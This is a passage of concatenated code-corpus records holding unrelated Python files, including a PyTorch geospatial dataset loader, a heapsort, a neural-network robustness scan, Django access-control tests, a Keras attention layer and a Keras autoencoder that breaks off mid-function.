(rois[:,3] <= patch_end[1]))\n rois = rois[inside, :]\n \n return rois\n \n # --------------------------------------------------------------------------\n def collate(self, batch):\n \"\"\"Collation function to be used with data loaders\"\"\"\n \n images = []\n indices = []\n roi_size = 5 if self.Train else 4\n rois = torch.zeros((len(batch), 20, roi_size), dtype=torch.float32)\n rois = rois.to(batch[0][1].device)\n \n for _b in range(len(batch)):\n # Accumulate patches:\n images.append(batch[_b][0].to(torch.float32))\n indices.append(batch[_b][2])\n \n # Accumulate ROI:\n \"\"\"\n image_num = torch.Tensor([_b]).expand(batch[_b][1].size(0))\n image_num = image_num.type(batch[_b][1].dtype).view(-1,1)\n image_num = image_num.to(batch[_b][1].device)\n _roi = torch.cat([image_num, batch[_b][1]], dim=1)\n rois = torch.cat([rois, _roi], dim=0)\n \"\"\"\n num_boxes = batch[_b][1].size(0)\n rois[_b,:num_boxes,:] = batch[_b][1]\n \n \n # Stack outputs and return\n batch = [torch.stack(images, dim=0), rois, torch.Tensor(indices)]\n return batch\n \n # --------------------------------------------------------------------------\n def load_images(self):\n \"\"\"\n Use the Colombia dataset:\n \"\"\"\n \n # Create BigTiff objects for dataset images:\n images = {}\n for dataset in self.Name:\n for region in self._config[dataset]:\n reg_dir = os.path.join(self._root, dataset, region)\n imgfile = '{0}_ortho-cog.tif'.format(region)\n imgfile = os.path.join(reg_dir, imgfile)\n btif = Bigtiff(imgfile)\n \n # Load extents in world coordinates and setup the spatial maps:\n meta_json = '{0}-imagery.json'.format(region)\n meta_json = os.path.join(reg_dir, meta_json)\n with open(meta_json, 'r') as fid:\n _meta = fid.read()\n metadata = json.loads(_meta)\n _xmin, _ymin, _xmax, _ymax = metadata['bbox']\n \n # Create spatial mapping for each image level:\n refmaps = [SpatialMap(imsize, [_xmin, _xmax], [_ymin, _ymax]) \n for imsize in btif.ImageSize]\n btif.setSpatialMap(refmaps)\n \n images[region] = btif\n \n return images\n \n # --------------------------------------------------------------------------\n def load_groundtruth(self, images):\n \"\"\"\n Parse JSON\n \"\"\"\n groundtruth = {}\n \n for dataset in 
self.Name:\n for region in self._config[dataset]:\n # Identify the JSON file that holds ground truth:\n if self.Train:\n _json = 'train-{0}.geojson'.format(region)\n else:\n _json = 'test-{0}.geojson'.format(region)\n\n reg_dir = os.path.join(self._root, dataset, region)\n _json = os.path.join(reg_dir, _json)\n \n # Decode the JSON:\n with open(_json, 'r') as fid:\n json_data = fid.read()\n _jsonDict = json.loads(json_data)\n features = _jsonDict[\"features\"]\n \n # Concatenate all features:\n roi_sz = (len(features),5) if self.Train else (len(features),4)\n rois = np.zeros(roi_sz, dtype=np.float)\n roi_ids = []\n \n for n, roi in enumerate(features):\n roi_id = roi['id']\n coordinates = np.array(roi['geometry']['coordinates'])\n \n if len(coordinates.shape) != 3:\n # NOTE: Some data points have ROI coodinates provided as\n # two disjoint sets of ROI. For this flatten the \n # list before creating the array.\n coordinates = coordinates[0][0]\n\n coordinates = np.reshape(coordinates, (-1,2))\n \n # NOTE: Some ROIs are polygonal due to the shape of the \n # roof not being quadrilateral, these data points are \n # aggregated to an enclosing quadrilateral as the \n # network is only capable of detecting bounding boxes.\n _top_left = np.amin(coordinates, axis=0)\n _bot_right = np.amax(coordinates, axis=0)\n \n # Append the roi label info:\n bbox = np.append(_top_left, _bot_right)\n if self.Train:\n material = roi['properties']['roof_material']\n cls_label = np.array(self._classes.index(material))\n bbox = np.append(bbox, cls_label)\n \n rois[n,:] = bbox\n roi_ids += [roi_id]\n\n # Rearrange the labels into [y1 x2 y2 x2] format:\n if self.Train:\n rois = rois[:,[1,0,3,2,4]]\n else:\n rois = rois[:,[1,0,3,2]]\n \n # Convert the ROI coordinates from latitude and longitude \n # coordinates to image row-col.\n btif = images[region]\n refmap = btif.SpatialMapping[btif.DirectoryID]\n \n # Correct Y coordinate notation and set the origin to top-left:\n # NOTE: Doing this will flip the ymin and ymax coordinates as they \n # would now correspond to opposite corners.\n rois[:,[2,0]] = refmap.YLimits[1] - \\\n (rois[:,[0,2]] - refmap.YLimits[0])\n \n rois[:,[0,1]] = refmap.spatial2Image(rois[:,[1,0]])\n rois[:,[2,3]] = refmap.spatial2Image(rois[:,[3,2]])\n \n # Add to dictionary:\n groundtruth[region] = {\"ID\": roi_ids, \"ROI\": rois}\n \n return groundtruth\n \n # --------------------------------------------------------------------------\n def set_patchsize(self, images):\n # Strategy: For each image, obtain the maximum possible ROI height and \n # width. 
The global patch size (the size of network input) is \n # set to the nearest (ceil) power of 2 for all images in the \n # dataset.\n \n # Compute maximum size:\n _psize = 0;\n for region in images:\n btif = images[region]\n roi = self.GroundTruth[region]['ROI']\n height = roi[:,2] - roi[:,0] + 1\n width = roi[:,3] - roi[:,1] + 1\n _psize = max(_psize, \n np.maximum(np.amax(height), np.amax(width)).item())\n \n # Adjust the patch size to nearest (ceil) power of two and update the \n # bigTIFFs.\n _psize = np.power(2, np.floor(np.log2(_psize))).astype(np.int).item()\n \n for region in images:\n btif = images[region]\n btif.PatchSize[btif.DirectoryID] = [_psize, _psize]\n \n return [_psize, _psize]\n \n # --------------------------------------------------------------------------\n def count_classes(self, index=None):\n \"\"\"Compute the class count of ROIs for each sample.\"\"\"\n \n if index is None:\n index = np.arange(self.Samples.shape[0])\n elif isinstance(index, int):\n index = [index]\n \n count = np.zeros((len(index), len(self._classes)), dtype=np.int)\n for _ind in range(len(index)):\n rois = self.__getrois__(index[_ind])\n count[_ind, :] = np.bincount(rois[:,4].astype(np.int), \n minlength=len(self._classes))\n \n return count\n \n # --------------------------------------------------------------------------\n def balance_classes(self, classids):\n \"\"\"Balance ROI instances across the dataset\n \n Arguments:\n ClassIDs - Define the set of classes that should be considered while sample balancing. Helps ignore labels that are inconsequential.\n \"\"\"\n \n # Get ROI class counts for each sample patch:\n samples = self.SampleID\n counts = self.count_classes(samples)\n counts = counts[:, classids]\n totalcount = np.sum(counts, axis=0)\n \n # Find the class with minimum and maximum total count:\n c_min = np.argmin(totalcount)\n c_max = np.argmax(totalcount)\n \n # Class balancing is performed as long as the min-max class ratio is \n # not within 50%.\n #\n # Balancing Algorithm:\n # * Randomly sample from samples with non-zero min-class ROI counts \n # and zero maximum class ROIs.\n # * Simulaneously, randomly sample a subset of max-class only samples \n # to be removed from the dataset. 
This levels the field from both \n # directions.\n class_ratio = totalcount[c_min] / totalcount[c_max]\n while (class_ratio < 0.5) & (len(samples) < 3*5000):\n # Find samples with maximum min-max class ratio:\n N = np.sum((counts[:,c_min] > 0) & (counts[:,c_max] == 0))\n M = int(0.5*N)\n \n # Min-class samples to add:\n min_sample = np.nonzero((counts[:,c_min]>0) & (counts[:,c_max]==0))\n min_sample = min_sample[0] # Unfold tuple\n min_sample = min_sample[np.random.randint(0, len(min_sample)-1, N)]\n \n # Max-class samples to remove:\n max_sample = np.nonzero((counts[:,c_min]==0) & (counts[:,c_max]>0))\n max_sample = max_sample[0] # Unfold tuple\n max_sample = max_sample[np.random.randint(0, len(max_sample)-1, M)]\n max_sample = np.unique(max_sample)\n \n # Construct new sample set:\n min_sample = samples[min_sample]\n samples = np.append(np.delete(samples, max_sample), min_sample)\n \n # Recompute total count and min-max class ratio:\n counts = self.count_classes(samples)[:, classids]\n totalcount = np.sum(counts, axis=0)\n c_min = np.argmin(totalcount)\n c_max = np.argmax(totalcount)\n class_ratio = totalcount[c_min] / totalcount[c_max]\n \n # Done, balanced, update samples:\n balancedset = self.Samples[samples,:]\n self._set_sampling_scheme_(balancedset)\n\n # --------------------------------------------------------------------------\n def get_max_rois(self):\n \"\"\"Find the maximum number of ROIs per batch sample in the dataset\"\"\"\n \n maxsize = 0\n for index in self.SampleID:\n rois = self.__getrois__(index);\n maxsize = max(maxsize, rois.shape[0])\n \n return maxsize\n# ______________________________________________________________________________\n\n\ndef partition(worker_id):\n \"\"\"Worker Initialization Function for parallel batch loading.\"\"\"\n \n worker_info = torch.utils.data.get_worker_info()\n dataset = worker_info.dataset\n \n # Re-create BigTIFF objects that turned stale after serialization:\n for region in dataset.BigTIFFs:\n imgfile = dataset.BigTIFFs[region].Source\n dirID = dataset.BigTIFFs[region].DirectoryID\n patchSize = dataset.BigTIFFs[region].PatchSize[dirID]\n \n dataset.BigTIFFs[region] = Bigtiff(imgfile)\n dataset.BigTIFFs[region].setDirectory(dirID)\n dataset.BigTIFFs[region].setPatchSize(patchSize)\n \n # configure the dataset to only process the split workload\n per_worker = int(math.ceil(dataset.SampleID.shape[0] /\n float(worker_info.num_workers) ))\n \n sampleStart = worker_id * per_worker\n sampleEnd = sampleStart + per_worker\n dataset.SampleID = dataset.SampleID[sampleStart:sampleEnd]","sub_path":"model/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":16489,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"69382565","text":"from helpers import swap\n\n\n#def parent(i):\n# return i//2\n\n\ndef right(i):\n return 2 * i + 2\n\n\ndef left(i):\n return 2 * i + 1\n\n\ndef heapsort(A):\n build_max_heap(A)\n\n for i in range(0, len(A)):\n swap(A, 0, len(A)-i-1)\n max_heapify(A, 0, len(A)-i-1)\n return A\n\n\ndef build_max_heap(A):\n for i in range(len(A)//2 + 1, -1, -1):\n max_heapify(A, i, len(A))\n\n\ndef max_heapify(A, i, leng):\n length = leng\n l = left(i)\n r = right(i)\n if l < length and A[i] < A[l]:\n largest = l\n else:\n largest = i\n if r < length and A[largest] < A[r]:\n largest = r\n if largest != i:\n swap(A, largest, i)\n max_heapify(A, largest, 
length)\n","sub_path":"heap.py","file_name":"heap.py","file_ext":"py","file_size_in_byte":707,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"145554090","text":"# global imports\nimport numpy as np\nimport rootpy.plotting as rp\nimport os\nimport sys\nimport socket\nimport matplotlib.pyplot as plt\nfrom matplotlib import gridspec\nimport ROOT\n# local imports\nfiledir = os.path.dirname(os.path.realpath(__file__))\nbasedir = os.path.dirname(filedir)\nsys.path.append(basedir)\n\nimport math\nimport DRACO_Frameworks.DNN_Aachen.DNN_Aachen as DNN_Aachen\nimport DRACO_Frameworks.DNN_Aachen.variable_info as variable_info\nimport DRACO_Frameworks.DNN_Aachen.data_frame as data_frame\nimport pyrootsOfTheCaribbean.plot_configs.plotting_styles as pltstyle\n\ncategory_vars = {\n \"4j_ge3t\": variable_info.variables_4j_3b,\n \"4j_4t\": variable_info.variables_4j_3b,\n \"5j_ge3t\": variable_info.variables_5j_3b,\n \"ge6j_ge3t\": variable_info.variables_6j_3b} \ncategories = {\n \"4j_ge3t\": \"(N_Jets == 4 and N_BTagsM >= 3)\",\n \"4j_4t\": \"(N_Jets == 4 and N_BTagsM == 4)\",\n \"5j_ge3t\": \"(N_Jets == 5 and N_BTagsM >= 3)\",\n \"ge6j_ge3t\": \"(N_Jets >= 6 and N_BTagsM >= 3)\",\n }\nprenet_targets = [\n #\"GenAdd_BB_inacceptance\",\n #\"GenAdd_B_inacceptance\",\n \"GenHiggs_BB_inacceptance\",\n \"GenHiggs_B_inacceptance\",\n \"GenTopHad_B_inacceptance\",\n \"GenTopHad_QQ_inacceptance\",\n \"GenTopHad_Q_inacceptance\",\n \"GenTopLep_B_inacceptance\"\n ]\n\nevent_classes = [\"ttHbb\", \"ttbb\", \"tt2b\", \"ttb\", \"ttcc\", \"ttlf\"]\n\nif \"naf\" in socket.gethostname():\n workpath = \"/nfs/dust/cms/user/vdlinden/DRACO-MLfoy/workdir/\"\nelse:\n workpath = \"/ceph/vanderlinden/DRACO-MLfoy/workdir/\"\n\n\ninPath = workpath+\"/AachenDNN_files\"\n\ntry:\n key = sys.argv[1]\n smearing = eval(sys.argv[2])\n if smearing: print(\"doing smearing (x->x+rnd.normal(0,sigma))\")\n else: print(\"doing scaling (x->x*rnd.normal(1,sigma))\")\nexcept:\n print(\"first argument: JT cagegory\")\n print(\"second argument: smearing/scaling (1/0)\")\n exit()\n\noutpath = workpath+\"/AachenDNN_v2_\"+str(key)+\"/\"\ncheckpoint_path = outpath + \"/checkpoints/trained_main_net.h5py\"\n\nresult_dir = \"/ceph/vanderlinden/DRACO-MLfoy/WiggleStudies/results/KSscans\"\nif smearing: result_dir += \"_smearing/\"\nelse: result_dir += \"_scaling/\"\nif not os.path.exists(result_dir):\n os.makedirs(result_dir)\nresult_dir += \"/\"+str(key)+\"/\"\nif not os.path.exists(result_dir):\n os.makedirs(result_dir)\n\ndnn_aachen = DNN_Aachen.DNN(\n in_path = inPath,\n save_path = outpath,\n event_classes = event_classes,\n event_category = categories[key],\n train_variables = category_vars[key],\n prenet_targets = prenet_targets,\n train_epochs = 500,\n early_stopping = 20,\n eval_metrics = [\"acc\"],\n additional_cut = None)\n\n\ndef gen_discrs( predictions ):\n discr_nodes = [[] for _ in event_classes]\n for evt in predictions:\n pred_class = np.argmax(evt)\n pred_value = evt[pred_class]\n discr_nodes[pred_class].append(pred_value)\n\n return discr_nodes\n\n\n\ndnn_aachen.load_trained_model()\ndata = dnn_aachen.data.get_test_data(as_matrix=False)\nprediction_before = dnn_aachen.main_net.predict(data.values)\n\ndiscriminators_before = gen_discrs(prediction_before)\nbefore_hists = []\n\nbins = 100\nbin_range = [0.,1.]\nfor i_node in range(len(event_classes)):\n node_values = discriminators_before[i_node]\n h = rp.Hist(bins, *bin_range, title = \"before smearing\")\n h.markersize = 0\n 
h.legendstyle = \"F\"\n h.fillstyle = \"solid\"\n h.linecolor = \"black\"\n h.fill_array( node_values )\n before_hists.append(h)\n\n# generate loop over different std deviation\nstddevs = np.arange(0.005,0.305,0.01)\nprint(stddevs)\n#np.arange(0.01,0.31,0.01)\n\nrate_of_other_argmax = []\nmean_diff = []\nstd_diff = []\n\nks_per_node = [[] for _ in event_classes]\nks_std_per_node = [[] for _ in event_classes]\nn_samples = 20\nfor sigma in stddevs:\n print(\"at sigma \"+str(sigma))\n # apply some uncertainties to data\n def func(x):\n if smearing: return x + np.random.normal(0,sigma)\n else: return x*np.random.normal(1,sigma)\n\n ks_values = [[] for _ in event_classes]\n for n_iter in range(n_samples):\n # wiggle data\n data_new = data.applymap(func)\n\n # generate new predictions\n prediction_after = dnn_aachen.main_net.predict(data_new.values)\n\n discriminators_after = gen_discrs(prediction_after)\n\n for i_node in range(len(event_classes)):\n node_values = discriminators_after[i_node]\n new_h = rp.Hist(bins,*bin_range, title = \"after smearing (s = {:.4f})\".format(sigma))\n new_h.fill_array( node_values )\n\n ks_prob = before_hists[i_node].KolmogorovTest(new_h)#,\"N\")\n ks_values[i_node].append(ks_prob)\n\n for i_node in range(len(event_classes)):\n ks_per_node[i_node].append(np.mean(ks_values[i_node]))\n ks_std_per_node[i_node].append(np.std(ks_values[i_node]))\n\nfor i_node in range(len(event_classes)):\n print(\"plotting hist for node {}\".format(i_node))\n plt.clf()\n plt.figure(figsize = [7,5])\n \n plt.errorbar( stddevs, ks_per_node[i_node], yerr = ks_std_per_node[i_node], fmt = \"o\", color = \"black\") \n\n plt.xlabel(\"smearing factor s\")\n plt.ylabel(\"KS prob\")\n plt.title(str(event_classes[i_node])+\" node\", loc = \"left\")\n plt.title(categories[key], loc = \"right\")\n save_dir = result_dir +\"/KS_scan_{}_node.pdf\".format( event_classes[i_node])\n plt.savefig(save_dir )\n print(\"saved plot at {}\".format(save_dir))\n","sub_path":"studies/wiggleStudies/ks_scan.py","file_name":"ks_scan.py","file_ext":"py","file_size_in_byte":5473,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"320053912","text":"# -*- coding: utf-8 -*-\nfrom bogemail import api\nimport datetime\n\ndef main(period, rep_type, prod):\n period = datetime.datetime.strptime(period, '%Y-%m')\n riad_obj = api.RIADObject(period, prod=prod)\n if rep_type == 'w_fcl':\n ent = riad_obj.compliance([('S.125', 'S.125.C', None)])\n \n elif rep_type == 'w_aepey':\n ent1 = riad_obj.compliance([('S.125', 'S.125.B', None)])\n ent2 = riad_obj.compliance([('S.126', 'S.126.X', 'S.126.X.A')])\n ent = ent1[0] | ent2[0], ent1[1] | ent2[1] \n\n elif rep_type == 'w_aedak':\n ent = riad_obj.compliance([('S.126', 'S.126.A', None)])\n\n if len(ent[1]) == 0:\n print('All entities have reported for the reference period')\n riad_obj.non_compl_report(ent)\nif __name__ == '__main__':\n import argparse\n parser = argparse.ArgumentParser(description='Non compliance report')\n parser.add_argument('period', help='Period in Y-m format')\n parser.add_argument('type_warn', choices=['w_fcl', 'w_aepey', 'w_aedak'], help='Specify the non_compliance report')\n parser.add_argument('--prod', dest='prod', action='store_true')\n parser.add_argument('--no-prod', dest='prod', action='store_false')\n parser.set_defaults(prod=True)\n args = parser.parse_args()\n main(args.period, args.type_warn, 
args.prod)\n","sub_path":"centrale/bogemail/scripts/non_compliance.py","file_name":"non_compliance.py","file_ext":"py","file_size_in_byte":1314,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"612766640","text":"import json\n\nfrom django.contrib.auth.models import AnonymousUser, User\nfrom django.test import TestCase, override_settings\nfrom django.test import RequestFactory\nfrom django.utils import timezone\nfrom django.contrib.auth.models import User\n\nfrom rest_framework.test import APIRequestFactory\n\nfrom radio.models import Transmission, TalkGroup, System, TalkGroupAccess, TalkGroupWithSystem, Profile\nfrom radio.views import TalkGroupFilterViewSet\n\nclass TalkgroupRestictTests(TestCase):\n \"\"\"\n Test that only user 1 can see the Test TG 1 TalkGroup when access control is on\n \"\"\"\n def setUp(self):\n self.factory = RequestFactory()\n user1 = User.objects.create_user('user1', 'user1@example.com', 'pass1')\n User.objects.create_user('user2', 'user2@example.com', 'pass2')\n tg1 = TalkGroup.objects.create( dec_id=100, alpha_tag='Test TG 1' )\n Transmission.objects.create( \n start_datetime=timezone.now(),\n audio_file='100-1511023743_8.57213e+08',\n audio_file_type='mp3',\n audio_file_url_path='/',\n talkgroup=100,\n talkgroup_info = tg1,\n freq=0,\n )\n tg1_sys = TalkGroupWithSystem.objects.get(pk=tg1.pk)\n tg_access1 = TalkGroupAccess.objects.create(name='Demo1')\n tg_access1.talkgroups.add(tg1_sys)\n user1.profile.talkgroup_access.add(tg_access1)\n\n def test_talkgroup_exists(self):\n tg = TalkGroup.objects.get(alpha_tag = 'Test TG 1')\n self.assertEquals(str(tg), 'Test TG 1')\n\n @override_settings(ACCESS_TG_RESTRICT=False)\n def test_talkgroup_access_open(self):\n anon = User.objects.get\n response = self.client.get('/api_v1/tg/test-tg-1/')\n self.assertEqual(response.status_code, 200)\n data = json.loads(str(response.content, encoding='utf8'))\n self.assertEquals(data['count'], 1)\n\n @override_settings(ACCESS_TG_RESTRICT=True)\n def test_talkgroup_access_user1(self):\n user = User.objects.get(username='user1')\n request = self.factory.get('/api_v1/tg/test-tg-1/')\n request.user = user\n response = TalkGroupFilterViewSet.as_view()(request, filter_val='test-tg-1').render()\n #print(response.content)\n data = json.loads(str(response.content, encoding='utf8'))\n self.assertEquals(data['count'], 1)\n\n @override_settings(ACCESS_TG_RESTRICT=True)\n def test_talkgroup_access_user2(self):\n user = User.objects.get(username='user2')\n request = self.factory.get('/api_v1/tg/test-tg-1/')\n request.user = user\n response = TalkGroupFilterViewSet.as_view()(request, filter_val='test-tg-1').render()\n #print(response.content)\n data = json.loads(str(response.content, encoding='utf8'))\n self.assertEquals(data['count'], 0)\n\n","sub_path":"radio/tests/test_talkgroup_access.py","file_name":"test_talkgroup_access.py","file_ext":"py","file_size_in_byte":2826,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"66021139","text":"from backend import config\nfrom flask import Flask\nfrom flask_cors import CORS\n\n# Decorator pattern:\n# This pattern creates a decorator class which wraps the original class and providing and adding CORS headers to the api responses\n\ndef create_app():\n app = Flask(__name__)\n app.config.from_object(config)\n app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\n return app\n\napp = create_app()\n\n#Decorator for adding CORS headers to the api 
responses\nCORS(app)\n","sub_path":"manager.py","file_name":"manager.py","file_ext":"py","file_size_in_byte":471,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
{"seq_id":"498657276","text":"import yaml\nfrom collections import namedtuple\nfrom epm.enums import Platform, Architecture\nfrom epm.utils import system_info\nPLATFORM, ARCH = system_info()\n\n\nclass _REQUIRED(object):\n pass\n\n\ndef _section(name, prototype, data):\n obj = {}\n for k, v in prototype.items():\n value = data.get(k, v) # a prototype value of _REQUIRED marks a mandatory field\n if value is _REQUIRED:\n raise SyntaxError('Register missing field in section %s: %s.' % (name, k))\n obj[k] = value\n\n Section = namedtuple(name, obj.keys())\n return Section._make(obj.values())\n\n\nclass Register(object):\n\n def __init__(self, filename):\n self._filename = filename\n self._local = None\n self._devices = None\n self._sandbox = None\n self._data = {}\n\n with open(filename) as f:\n self._data = yaml.safe_load(f)\n\n\n @property\n def local(self):\n \"\"\"local machine information. [local-machine] section\n\n .username\n .password\n .hostname\n .mount\n\n :return:\n \"\"\"\n if not self._local:\n default = {\n 'username': None,\n 'password': None,\n 'hostname': None,\n 'mount': 'cifs' if PLATFORM == Platform.WINDOWS else 'nfs'\n }\n self._local = _section('local', default, self._data.get('local-machine'))\n return self._local\n\n\n @property\n def devices(self):\n if self._devices is None:\n self._devices = {}\n for name, device in self._data.get('device', {}).items():\n prototype = {\n 'hostname': _REQUIRED,\n 'ssh': None,\n 'system': None\n }\n ssh = None\n system = None\n\n for k, v in device.items():\n if k == 'ssh':\n default = {\n 'username': None,\n 'password': None,\n 'port': 22,\n }\n ssh = _section('device_ssh', default, v)\n if k == 'system':\n default = {\n 'os': None,\n 'arch': None,\n 'crt': None,\n }\n system = _section('device_system', default, v)\n\n self._devices[name] = _section('device', prototype,\n {'ssh': ssh, 'system': system,\n 'hostname': device.get('hostname')})\n return self._devices\n\n @property\n def sandbox(self):\n if self._sandbox is None:\n prototype = {\n 'devices': [],\n }\n return _section('sandbox', prototype, self._data.get('sandbox'))\n return self._sandbox\n","sub_path":"epm/model/register.py","file_name":"register.py","file_ext":"py","file_size_in_byte":2935,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
{"seq_id":"491056020","text":"import django\n\nfrom . 
import views\n\nif django.VERSION[:2] >= (2, 0):\n from django.urls import path\n\n urlpatterns = [\n path('', views.SnippetList.as_view()),\n path('/', views.SnippetDetail.as_view()),\n path('views//', views.SnippetViewerList.as_view()),\n ]\nelse:\n from django.conf.urls import url\n\n urlpatterns = [\n url('^$', views.SnippetList.as_view()),\n url(r'^(?P\\d+)/$', views.SnippetDetail.as_view()),\n url(r'^views/(?P\\d+)/$', views.SnippetViewerList.as_view()),\n ]\n","sub_path":"testproj/snippets/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":572,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"71465960","text":"#%%\nimport matplotlib.pyplot as plt\n\nclass WordFrequency():\n def __init__(self, filepath):\n self.filepath = filepath\n\n def wordFrequency(self):\n with open(self.filepath, 'r') as fp:\n string = fp.read()\n string_list = string.title().split()\n string_dict = {}\n\n for i in string_list:\n string_dict[i] = string_list.count(i)\n\n wordList = [k for k in string_dict.keys()]\n frequencyList = [v for v in string_dict.values()]\n sortedWordList = [wl for fl, wl in sorted(zip(frequencyList, wordList))]\n\n plt.barh(tuple(sortedWordList), sorted(frequencyList), facecolor = 'g')\n plt.title('Indonesia Raya Word Frequency')\n plt.xlabel('Frequency')\n plt.ylabel('Words')\n plt.axis([0, 8, 0, len(wordList)])\n plt.show()\n\nfp = 'C:/Exercises/MrStavin/MrStavinsExercise/14October2019/somestrings.txt'\nwf = WordFrequency(fp)\nwf.wordFrequency()\n#%%","sub_path":"14October2019/wordfrequencies.py","file_name":"wordfrequencies.py","file_ext":"py","file_size_in_byte":980,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"444181122","text":"from keras.layers import Layer\nfrom keras import initializers\nfrom keras import backend as K\n\n\nclass SelfAttention(Layer):\n def __init__(self, regularizer=None, **kwargs):\n super(SelfAttention, self).__init__(**kwargs)\n self.regularizer = regularizer\n self.supports_masking = True\n\n def build(self, input_shape):\n self.context = self.add_weight(name='context',\n shape=(input_shape[-1], 1),\n initializer=initializers.RandomNormal(mean=0.0, stddev=0.05, seed=None),\n regularizer=self.regularizer,\n trainable=True)\n super(SelfAttention, self).build(input_shape)\n\n def call(self, x, mask=None):\n attention_in = K.exp(K.squeeze(K.dot(x, self.context), axis=-1))\n attention = attention_in / K.expand_dims(K.sum(attention_in, axis=-1), -1)\n\n if mask is not None:\n attention = attention * K.cast(mask, 'float32')\n\n weighted_sum = K.batch_dot(K.permute_dimensions(x, [0, 2, 1]), attention)\n return weighted_sum\n\n def compute_output_shape(self, input_shape):\n return (input_shape[0], input_shape[-1])\n\n def compute_mask(self, input, input_mask=None):\n return None\n","sub_path":"keras_attention/self_attention.py","file_name":"self_attention.py","file_ext":"py","file_size_in_byte":1316,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"609982908","text":"import numpy as np\r\nimport pandas as pd\r\nimport matplotlib.pyplot as plt\r\nfrom itertools import zip_longest\r\nfrom sklearn.model_selection import train_test_split\r\nfrom keras.models import Model, model_from_json\r\nfrom keras.layers import Input, Conv2D, MaxPooling2D, UpSampling2D, BatchNormalization, Dropout, Flatten, Dense, Reshape, Conv2DTranspose\r\nfrom sklearn.metrics import classification_report\r\nfrom 
tensorflow.python.keras import backend as K\r\nfrom PIL import Image\r\n\r\ndef numpy_from_dataset(inputpath, numbers, per_2_bytes):\r\n pixels = []\r\n numarray = []\r\n with open(inputpath, \"rb\") as file:\r\n for x in range(numbers):\r\n numarray.append(int.from_bytes(file.read(4), byteorder='big'))\r\n print(\"Storing data in array...\")\r\n # 2d numpy array for images->pixels\r\n if numbers == 4:\r\n if per_2_bytes:\r\n data = file.read(2)\r\n while data:\r\n pixels.append(int.from_bytes(data, byteorder='big'))\r\n data = file.read(2)\r\n pixels = np.array(list(bytes_group(numarray[3], pixels, fillvalue=0)))\r\n else:\r\n pixels = np.array(list(bytes_group(numarray[2]*numarray[3], file.read(), fillvalue=0)))\r\n elif numbers == 2:\r\n pixels = np.array(list(bytes_group(1, file.read(), fillvalue=0)))\r\n return pixels, numarray\r\n\r\ndef bytes_group(n, iterable, fillvalue=None):\r\n return zip_longest(*[iter(iterable)]*n, fillvalue=fillvalue)\r\n\r\ndef encoder(input_img, parameters):\r\n layers = parameters[0]\r\n filter_size = parameters[1]\r\n filters = parameters[2]\r\n conv = input_img\r\n for i in range(layers):\r\n conv = Conv2D(filters, (filter_size, filter_size), activation='relu', padding='same')(conv)\r\n conv = BatchNormalization()(conv)\r\n if (i<2):\r\n conv = MaxPooling2D(pool_size=(2,2))(conv)\r\n # conv = Dropout(0.2)(conv)\r\n filters*=2\r\n return conv\r\n\r\ndef bottleneck(enc, parameters):\r\n flatten_layer = Flatten()(enc)\r\n embedding_layer = Dense(parameters[5])(flatten_layer)\r\n dense_layer = Dense(flatten_layer.shape[1])(embedding_layer)\r\n reshape_layer = Reshape((enc.shape[1], enc.shape[2], enc.shape[3]))(dense_layer)\r\n return reshape_layer, embedding_layer\r\n\r\ndef decoder(conv, parameters):\r\n layers = parameters[0]\r\n filter_size = parameters[1]\r\n filters = parameters[2]*pow(2,parameters[0]-1)\r\n for i in range(layers):\r\n conv = Conv2DTranspose(filters, (filter_size, filter_size), activation='relu', padding='same')(conv)\r\n conv = BatchNormalization()(conv)\r\n if (i>=layers-2):\r\n conv = UpSampling2D((2,2))(conv)\r\n filters/=2\r\n conv = Conv2DTranspose(1, (3, 3), activation='sigmoid', padding='same')(conv)\r\n return conv\r\n\r\ndef save_model(model):\r\n modelname = input(\"Type the name for model(without extension eg.h5): \")\r\n print(\"Saving Model: \"+modelname+\".json & \"+modelname+\".h5...\")\r\n # Save model in JSON file\r\n model_json = model.to_json()\r\n with open(modelname+\".json\", \"w\") as json_file:\r\n json_file.write(model_json)\r\n # Save weights from model in h5 file\r\n model.save_weights(modelname+\".h5\")\r\n\r\ndef load_model(modelname):\r\n # Load model from JSON file\r\n print(\"Loading Model: \"+modelname+\".json & \"+modelname+\".h5...\")\r\n json_file = open(modelname+\".json\", 'r')\r\n autoencoder_json = json_file.read()\r\n json_file.close()\r\n autoencoder = model_from_json(autoencoder_json)\r\n # Load weights from h5 file\r\n autoencoder.load_weights(modelname+\".h5\")\r\n return autoencoder\r\n\r\ndef error_graphs(modeltrain, parameters, train_time, newparameter, indexparm, originparms, hypernames):\r\n loss = []\r\n val = []\r\n values = []\r\n times = []\r\n for i in range(len(newparameter)):\r\n loss.clear()\r\n val.clear()\r\n times.clear()\r\n values.clear()\r\n for j in newparameter[i]:\r\n values.append(j[0])\r\n loss.append(j[1])\r\n val.append(j[2])\r\n times.append(j[3])\r\n if (i == indexparm-1):\r\n values.append(parameters[indexparm-1])\r\n 
